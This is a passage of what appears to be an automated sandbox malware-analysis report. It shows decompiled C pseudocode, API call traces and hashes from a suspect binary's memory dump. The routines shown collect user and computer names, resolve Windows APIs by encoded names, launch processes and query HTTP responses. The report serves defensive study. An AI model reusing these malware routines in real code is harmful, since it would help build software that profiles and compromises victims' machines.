              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A0
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A8
              • Part of subcall function 02026675: strcpy.NTDLL ref: 020266BF
              • Part of subcall function 02026675: lstrcat.KERNEL32(00000000,00000000), ref: 020266CA
              • Part of subcall function 02026675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266E7
            • StrTrimA.SHLWAPI(00000000,02029280,?,02CA9600), ref: 02022D8F
              • Part of subcall function 02027563: lstrlen.KERNEL32(02CA9C10,00000000,00000000,00000000,02023EF9,00000000), ref: 02027573
              • Part of subcall function 02027563: lstrlen.KERNEL32(?), ref: 0202757B
              • Part of subcall function 02027563: lstrcpy.KERNEL32(00000000,02CA9C10), ref: 0202758F
              • Part of subcall function 02027563: lstrcat.KERNEL32(00000000,?), ref: 0202759A
            • lstrcpy.KERNEL32(00000000,?), ref: 02022DB2
            • lstrcpy.KERNEL32(?,?), ref: 02022DBC
            • lstrcat.KERNEL32(?,?), ref: 02022DCC
            • lstrcat.KERNEL32(?,00000000), ref: 02022DD3
              • Part of subcall function 02026536: lstrlen.KERNEL32(?,00000000,02CA9E18,00000000,02026F0A,02CAA03B,43175AC3,?,?,?,?,43175AC3,00000005,0202A00C,4D283A53,?), ref: 0202653D
              • Part of subcall function 02026536: mbstowcs.NTDLL ref: 02026566
              • Part of subcall function 02026536: memset.NTDLL ref: 02026578
            • wcstombs.NTDLL ref: 02022E76
              • Part of subcall function 0202597D: SysAllocString.OLEAUT32(?), ref: 020259B8
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • HeapFree.KERNEL32(00000000,?), ref: 02022EBF
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02022ECB
            • HeapFree.KERNEL32(00000000,?,?,02CA9600), ref: 02022ED8
            • HeapFree.KERNEL32(00000000,?), ref: 02022EE5
            • HeapFree.KERNEL32(00000000,?), ref: 02022EEF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
            • String ID: Uet
            • API String ID: 1185349883-2766386878
            • Opcode ID: 836d654cd3a77a2d053e82c13f2fa2ab452557d0feee056910e3de56822d57cd
            • Instruction ID: f1c64b7985f595dee5422b2d22f5cc6e0e9026f76191a9003f6f60c0d6d20c60
            • Opcode Fuzzy Hash: 836d654cd3a77a2d053e82c13f2fa2ab452557d0feee056910e3de56822d57cd
            • Instruction Fuzzy Hash: 2FA18E71A00324AFCB21DB64DC84E9A7BE9FF48714F26092AF848D7220DB35D95DEB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E020237DF(void* __eax, void* __ecx) {
            				long _v8;
            				char _v12;
            				void* _v16;
            				void* _v28;
            				long _v32;
            				void _v104;
            				char _v108;
            				long _t36;
            				intOrPtr _t40;
            				intOrPtr _t47;
            				intOrPtr _t50;
            				void* _t58;
            				void* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t71;
            
            				_t1 = __eax + 0x14; // 0x74183966
            				_t69 =  *_t1;
            				_t36 = E02026BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
            				_v8 = _t36;
            				if(_t36 != 0) {
            					L12:
            					return _v8;
            				}
            				E02027AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
            				_t40 = _v12(_v12);
            				_v8 = _t40;
            				if(_t40 == 0 && ( *0x202a300 & 0x00000001) != 0) {
            					_v32 = 0;
            					asm("stosd");
            					asm("stosd");
            					asm("stosd");
            					_v108 = 0;
            					memset( &_v104, 0, 0x40);
            					_t47 =  *0x202a348; // 0xc7d5a8
            					_t18 = _t47 + 0x202b706; // 0x73797325
            					_t68 = E0202127E(_t18);
            					if(_t68 == 0) {
            						_v8 = 8;
            					} else {
            						_t50 =  *0x202a348; // 0xc7d5a8
            						_t19 = _t50 + 0x202b86c; // 0x2ca8e14
            						_t20 = _t50 + 0x202b3f6; // 0x4e52454b
            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
            						if(_t71 == 0) {
            							_v8 = 0x7f;
            						} else {
            							_v108 = 0x44;
            							E02025B56();
            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
            							_push(1);
            							E02025B56();
            							if(_t58 == 0) {
            								_v8 = GetLastError();
            							} else {
            								CloseHandle(_v28);
            								CloseHandle(_v32);
            							}
            						}
            						HeapFree( *0x202a2d8, 0, _t68);
            					}
            				}
            				_t70 = _v16;
            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
            				E020261DA(_t70);
            				goto L12;
            			}


















            0x020237e7
            0x020237e7
            0x020237f6
            0x020237fd
            0x02023802
            0x0202390f
            0x02023916
            0x02023916
            0x02023811
            0x02023819
            0x0202381c
            0x02023821
            0x02023836
            0x0202383c
            0x0202383d
            0x02023840
            0x02023846
            0x02023849
            0x0202384e
            0x02023856
            0x02023862
            0x02023866
            0x020238f6
            0x0202386c
            0x0202386c
            0x02023871
            0x02023878
            0x0202388c
            0x02023890
            0x020238df
            0x02023892
            0x02023893
            0x0202389a
            0x020238b3
            0x020238b5
            0x020238b9
            0x020238c0
            0x020238da
            0x020238c2
            0x020238cb
            0x020238d0
            0x020238d0
            0x020238c0
            0x020238ee
            0x020238ee
            0x02023866
            0x020238fd
            0x02023906
            0x0202390a
            0x00000000

            APIs
              • Part of subcall function 02026BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,020237FB,?,?,?,?,00000000,00000000), ref: 02026C1E
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02026C40
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02026C56
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02026C6C
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02026C82
              • Part of subcall function 02026BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02026C98
            • memset.NTDLL ref: 02023849
              • Part of subcall function 0202127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02023862,73797325), ref: 0202128F
              • Part of subcall function 0202127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 020212A9
            • GetModuleHandleA.KERNEL32(4E52454B,02CA8E14,73797325), ref: 0202387F
            • GetProcAddress.KERNEL32(00000000), ref: 02023886
            • HeapFree.KERNEL32(00000000,00000000), ref: 020238EE
              • Part of subcall function 02025B56: GetProcAddress.KERNEL32(36776F57,02022425), ref: 02025B71
            • CloseHandle.KERNEL32(00000000,00000001), ref: 020238CB
            • CloseHandle.KERNEL32(?), ref: 020238D0
            • GetLastError.KERNEL32(00000001), ref: 020238D4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3075724336-1616585941
            • Opcode ID: 261973659fa47aab88cc1079d56f9fd2b59f5d5d0dd08c375d821881d30dfddf
            • Instruction ID: 2f2638ef6b297eb6c3aeaf6d2db735061ffe57f5f5c29c3a7ab9814a445f63eb
            • Opcode Fuzzy Hash: 261973659fa47aab88cc1079d56f9fd2b59f5d5d0dd08c375d821881d30dfddf
            • Instruction Fuzzy Hash: 76310EB1D0031CAFDB21AFA4DC88EDEBBBDEB08304F114466E605A7511D7399A5CDB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02023FA5(void* __ecx, void* __esi) {
            				long _v8;
            				long _v12;
            				long _v16;
            				long _v20;
            				long _t34;
            				long _t39;
            				long _t42;
            				long _t56;
            				void* _t58;
            				void* _t59;
            				void* _t61;
            
            				_t61 = __esi;
            				_t59 = __ecx;
            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
            				do {
            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
            					_v20 = _t34;
            					if(_t34 != 0) {
            						L3:
            						_v8 = 4;
            						_v16 = 0;
            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
            							_t39 = GetLastError();
            							_v12 = _t39;
            							if(_v20 == 0 || _t39 != 0x2ef3) {
            								L15:
            								return _v12;
            							} else {
            								goto L11;
            							}
            						}
            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
            							goto L11;
            						} else {
            							_v16 = 0;
            							_v8 = 0;
            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
            							_t58 = E020233DC(_v8 + 1);
            							if(_t58 == 0) {
            								_v12 = 8;
            							} else {
            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
            									E020261DA(_t58);
            									_v12 = GetLastError();
            								} else {
            									 *((char*)(_t58 + _v8)) = 0;
            									 *(_t61 + 0xc) = _t58;
            								}
            							}
            							goto L15;
            						}
            					}
            					SetEvent( *(_t61 + 0x1c));
            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
            					_v12 = _t56;
            					if(_t56 != 0) {
            						goto L15;
            					}
            					goto L3;
            					L11:
            					_t42 = E020216B2( *(_t61 + 0x1c), _t59, 0xea60);
            					_v12 = _t42;
            				} while (_t42 == 0);
            				goto L15;
            			}














            0x02023fa5
            0x02023fa5
            0x02023fb5
            0x02023fb8
            0x02023fbc
            0x02023fc2
            0x02023fc7
            0x02023fe0
            0x02023ff4
            0x02023ffb
            0x02024002
            0x02024055
            0x0202405b
            0x02024061
            0x0202409c
            0x020240a2
            0x00000000
            0x00000000
            0x00000000
            0x02024061
            0x02024008
            0x00000000
            0x0202400f
            0x0202401d
            0x02024020
            0x02024023
            0x0202402f
            0x02024033
            0x02024095
            0x02024035
            0x02024047
            0x02024085
            0x02024090
            0x02024049
            0x0202404c
            0x02024050
            0x02024050
            0x02024047
            0x00000000
            0x02024033
            0x02024008
            0x02023fcc
            0x02023fd2
            0x02023fd5
            0x02023fda
            0x00000000
            0x00000000
            0x00000000
            0x0202406a
            0x02024072
            0x02024077
            0x0202407a
            0x00000000

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 02023FBC
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?), ref: 02023FCC
            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02023FFE
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02024023
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02024043
            • GetLastError.KERNEL32 ref: 02024055
              • Part of subcall function 020216B2: WaitForMultipleObjects.KERNEL32(00000002,02027C47,00000000,02027C47,?,?,?,02027C47,0000EA60), ref: 020216CD
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • GetLastError.KERNEL32(00000000), ref: 0202408A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID: @MetNet
            • API String ID: 3369646462-2109406137
            • Opcode ID: 3f281b9645d0c46f4c77e3d50806c355223f6bee6fe0cc3a96d14a4a9aa358ea
            • Instruction ID: bb566f88513e17a76e29dfb1dd6e1ddb39d25c55bfb6cb3585e3033f0a566a26
            • Opcode Fuzzy Hash: 3f281b9645d0c46f4c77e3d50806c355223f6bee6fe0cc3a96d14a4a9aa358ea
            • Instruction Fuzzy Hash: 3B31CBB5D0031DEFDB21DFA5C8C4A9EBBF8BB08704F10496AE542A2141D775AA88EF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E02027238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t58;
            				signed int _t60;
            				signed int _t62;
            				intOrPtr _t64;
            				intOrPtr _t66;
            				intOrPtr _t70;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            				intOrPtr _t80;
            				WCHAR* _t83;
            				void* _t84;
            				void* _t85;
            				void* _t86;
            				intOrPtr _t92;
            				intOrPtr* _t102;
            				signed int _t103;
            				void* _t104;
            				intOrPtr _t105;
            				void* _t107;
            				intOrPtr* _t115;
            				void* _t119;
            				intOrPtr _t125;
            
            				_t58 =  *0x202a3dc; // 0x2ca9cc0
            				_v24 = _t58;
            				_v28 = 8;
            				_v20 = GetTickCount();
            				_t60 = E02026ABD();
            				_t103 = 5;
            				_t98 = _t60 % _t103 + 6;
            				_t62 = E02026ABD();
            				_t117 = _t62 % _t103 + 6;
            				_v32 = _t62 % _t103 + 6;
            				_t64 = E020242E9(_t60 % _t103 + 6);
            				_v16 = _t64;
            				if(_t64 != 0) {
            					_t66 = E020242E9(_t117);
            					_v12 = _t66;
            					if(_t66 != 0) {
            						_push(5);
            						_t104 = 0xa;
            						_t119 = E0202398D(_t104,  &_v20);
            						if(_t119 == 0) {
            							_t119 = 0x202918c;
            						}
            						_t70 = E02025FA1(_v24);
            						_v8 = _t70;
            						if(_t70 != 0) {
            							_t115 = __imp__;
            							_t72 =  *_t115(_t119);
            							_t75 =  *_t115(_v8);
            							_t76 =  *_t115(_a4);
            							_t80 = E020233DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
            							_v24 = _t80;
            							if(_t80 != 0) {
            								_t105 =  *0x202a348; // 0xc7d5a8
            								_t102 =  *0x202a138; // 0x2027ddd
            								_t28 = _t105 + 0x202bd10; // 0x530025
            								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
            								_push(4);
            								_t107 = 5;
            								_t83 = E0202398D(_t107,  &_v20);
            								_a8 = _t83;
            								if(_t83 == 0) {
            									_a8 = 0x2029190;
            								}
            								_t84 =  *_t115(_a8);
            								_t85 =  *_t115(_v8);
            								_t86 =  *_t115(_a4);
            								_t125 = E020233DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
            								if(_t125 == 0) {
            									E020261DA(_v24);
            								} else {
            									_t92 =  *0x202a348; // 0xc7d5a8
            									_t44 = _t92 + 0x202ba20; // 0x73006d
            									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
            									 *_a16 = _v24;
            									_v28 = _v28 & 0x00000000;
            									 *_a20 = _t125;
            								}
            							}
            							E020261DA(_v8);
            						}
            						E020261DA(_v12);
            					}
            					E020261DA(_v16);
            				}
            				return _v28;
            			}



































            0x0202723e
            0x02027246
            0x02027249
            0x02027256
            0x02027259
            0x02027260
            0x02027267
            0x0202726a
            0x02027277
            0x0202727a
            0x0202727d
            0x02027282
            0x02027287
            0x0202728f
            0x02027294
            0x02027299
            0x0202729f
            0x020272a3
            0x020272ac
            0x020272b0
            0x020272b2
            0x020272b2
            0x020272ba
            0x020272bf
            0x020272c4
            0x020272ca
            0x020272d1
            0x020272e2
            0x020272e9
            0x020272fb
            0x02027300
            0x02027305
            0x0202730e
            0x02027317
            0x02027320
            0x02027336
            0x0202733b
            0x0202733f
            0x02027343
            0x02027348
            0x0202734d
            0x0202734f
            0x0202734f
            0x02027359
            0x02027362
            0x02027369
            0x02027385
            0x02027389
            0x020273c2
            0x0202738b
            0x0202738e
            0x02027396
            0x020273a7
            0x020273af
            0x020273b7
            0x020273bb
            0x020273bb
            0x02027389
            0x020273ca
            0x020273ca
            0x020273d2
            0x020273d2
            0x020273da
            0x020273da
            0x020273e6

            APIs
            • GetTickCount.KERNEL32 ref: 02027250
            • lstrlen.KERNEL32(00000000,00000005), ref: 020272D1
            • lstrlen.KERNEL32(?), ref: 020272E2
            • lstrlen.KERNEL32(00000000), ref: 020272E9
            • lstrlenW.KERNEL32(80000002), ref: 020272F0
            • lstrlen.KERNEL32(?,00000004), ref: 02027359
            • lstrlen.KERNEL32(?), ref: 02027362
            • lstrlen.KERNEL32(?), ref: 02027369
            • lstrlenW.KERNEL32(?), ref: 02027370
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlen$CountFreeHeapTick
            • String ID:
            • API String ID: 2535036572-0
            • Opcode ID: 0a3e4e2579f3ab0e2529fd63e73a71961c2e045c4e2c3c19b4614ae3adcffde6
            • Instruction ID: 172b767867b5d3b6c82076f163f261c17a55754436d71f54995277c2b5e4c75c
            • Opcode Fuzzy Hash: 0a3e4e2579f3ab0e2529fd63e73a71961c2e045c4e2c3c19b4614ae3adcffde6
            • Instruction Fuzzy Hash: 35517E32D00329ABCF12AFA5CD84ADE7BB6EF44314F154066E904A7250DB35DA29EF94
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02021340() {
            				long _v8;
            				long _v12;
            				int _v16;
            				long _t39;
            				long _t43;
            				signed int _t47;
            				short _t51;
            				signed int _t52;
            				int _t56;
            				int _t57;
            				char* _t64;
            				short* _t67;
            
            				_v16 = 0;
            				_v8 = 0;
            				GetUserNameW(0,  &_v8);
            				_t39 = _v8;
            				if(_t39 != 0) {
            					_v12 = _t39;
            					_v8 = 0;
            					GetComputerNameW(0,  &_v8);
            					_t43 = _v8;
            					if(_t43 != 0) {
            						_t11 = _t43 + 2; // 0x76b5c742
            						_v12 = _v12 + _t11;
            						_t64 = E020233DC(_v12 + _t11 << 2);
            						if(_t64 != 0) {
            							_t47 = _v12;
            							_t67 = _t64 + _t47 * 2;
            							_v8 = _t47;
            							if(GetUserNameW(_t67,  &_v8) == 0) {
            								L7:
            								E020261DA(_t64);
            							} else {
            								_t51 = 0x40;
            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
            								_t52 = _v8;
            								_v12 = _v12 - _t52;
            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
            									goto L7;
            								} else {
            									_t56 = _v12 + _v8;
            									_t31 = _t56 + 2; // 0x2023e01
            									_v12 = _t56;
            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
            									_v8 = _t57;
            									if(_t57 == 0) {
            										goto L7;
            									} else {
            										_t64[_t57] = 0;
            										_v16 = _t64;
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v16;
            			}















            0x0202134e
            0x02021351
            0x02021354
            0x0202135a
            0x0202135f
            0x02021365
            0x0202136d
            0x02021370
            0x02021376
            0x0202137b
            0x02021384
            0x02021388
            0x02021395
            0x02021399
            0x0202139b
            0x0202139f
            0x020213a2
            0x020213b2
            0x02021405
            0x02021406
            0x020213b4
            0x020213b9
            0x020213ba
            0x020213bf
            0x020213c2
            0x020213d5
            0x00000000
            0x020213d7
            0x020213da
            0x020213df
            0x020213ed
            0x020213f0
            0x020213f6
            0x020213fb
            0x00000000
            0x020213fd
            0x020213fd
            0x02021400
            0x02021400
            0x020213fb
            0x020213d5
            0x0202140b
            0x0202140c
            0x0202137b
            0x02021412

            APIs
            • GetUserNameW.ADVAPI32(00000000,02023DFF), ref: 02021354
            • GetComputerNameW.KERNEL32(00000000,02023DFF), ref: 02021370
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetUserNameW.ADVAPI32(00000000,02023DFF), ref: 020213AA
            • GetComputerNameW.KERNEL32(02023DFF,76B5C740), ref: 020213CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02023DFF,00000000,02023E01,00000000,00000000,?,76B5C740,02023DFF), ref: 020213F0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID: @het
            • API String ID: 3850880919-3010869118
            • Opcode ID: 636985bdb2cc0dae92704a6a1b3abeea0299f80cc73e3206bc19933e40320496
            • Instruction ID: dd0249640c478a1f99a9a1bca4208c48eb402efab2361525a38dc1d1549badda
            • Opcode Fuzzy Hash: 636985bdb2cc0dae92704a6a1b3abeea0299f80cc73e3206bc19933e40320496
            • Instruction Fuzzy Hash: 1121D876900218FFCB15DFE5D9849EEBBB8EF48204B2144AAE609E7241DB349B49DB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E020254D8(intOrPtr _a4) {
            				void* _t2;
            				unsigned int _t4;
            				void* _t5;
            				long _t6;
            				void* _t7;
            				void* _t15;
            
            				_t2 = CreateEventA(0, 1, 0, 0);
            				 *0x202a30c = _t2;
            				if(_t2 == 0) {
            					return GetLastError();
            				}
            				_t4 = GetVersion();
            				if(_t4 != 5) {
            					L4:
            					if(_t15 <= 0) {
            						_t5 = 0x32;
            						return _t5;
            					}
            					L5:
            					 *0x202a2fc = _t4;
            					_t6 = GetCurrentProcessId();
            					 *0x202a2f8 = _t6;
            					 *0x202a304 = _a4;
            					_t7 = OpenProcess(0x10047a, 0, _t6);
            					 *0x202a2f4 = _t7;
            					if(_t7 == 0) {
            						 *0x202a2f4 =  *0x202a2f4 | 0xffffffff;
            					}
            					return 0;
            				}
            				if(_t4 >> 8 > 0) {
            					goto L5;
            				}
            				_t15 = _t4 - _t4;
            				goto L4;
            			}









            0x020254e0
            0x020254e6
            0x020254ed
            0x00000000
            0x02025547
            0x020254ef
            0x020254f7
            0x02025504
            0x02025504
            0x02025544
            0x00000000
            0x02025544
            0x02025506
            0x02025506
            0x0202550b
            0x0202551d
            0x02025522
            0x02025528
            0x0202552e
            0x02025535
            0x02025537
            0x02025537
            0x00000000
            0x0202553e
            0x02025500
            0x00000000
            0x00000000
            0x02025502
            0x00000000

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02025037,?), ref: 020254E0
            • GetVersion.KERNEL32 ref: 020254EF
            • GetCurrentProcessId.KERNEL32 ref: 0202550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02025528
            • GetLastError.KERNEL32 ref: 02025547
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID: @MetNet
            • API String ID: 2270775618-2109406137
            • Opcode ID: f21a8c2d49daffbb5cd6661e6cdfce1c8bebce54807a866912d84a81abf5a820
            • Instruction ID: a4b612f505625edbb011ff0543bd10545223955904e9304c10e2de4e78cfa1fd
            • Opcode Fuzzy Hash: f21a8c2d49daffbb5cd6661e6cdfce1c8bebce54807a866912d84a81abf5a820
            • Instruction Fuzzy Hash: 3CF081B0AC03269FD7794F24AD69B183FA6B704751F720817E516C61C0DB7880ACCB19
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 02023ABD
            • SysAllocString.OLEAUT32(0070006F), ref: 02023AD1
            • SysAllocString.OLEAUT32(00000000), ref: 02023AE3
            • SysFreeString.OLEAUT32(00000000), ref: 02023B4B
            • SysFreeString.OLEAUT32(00000000), ref: 02023B5A
            • SysFreeString.OLEAUT32(00000000), ref: 02023B65
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 252734380883e8546887b4b16134d5d89351a51cb03b46a4a143bc0f9291ba6c
            • Instruction ID: f9417af7ac7c0d9488a436c26a6e8de09911e4c8db057c31cdb5e9bb0d955f67
            • Opcode Fuzzy Hash: 252734380883e8546887b4b16134d5d89351a51cb03b46a4a143bc0f9291ba6c
            • Instruction Fuzzy Hash: 4F417E36D00619AFDB02EFBCC845A9EB7BAEF49300F144466EA10EB120DB75D909CF91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02026BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
            				intOrPtr _v8;
            				intOrPtr _t23;
            				intOrPtr _t26;
            				_Unknown_base(*)()* _t28;
            				intOrPtr _t30;
            				_Unknown_base(*)()* _t32;
            				intOrPtr _t33;
            				_Unknown_base(*)()* _t35;
            				intOrPtr _t36;
            				_Unknown_base(*)()* _t38;
            				intOrPtr _t39;
            				_Unknown_base(*)()* _t41;
            				intOrPtr _t44;
            				struct HINSTANCE__* _t48;
            				intOrPtr _t54;
            
            				_t54 = E020233DC(0x20);
            				if(_t54 == 0) {
            					_v8 = 8;
            				} else {
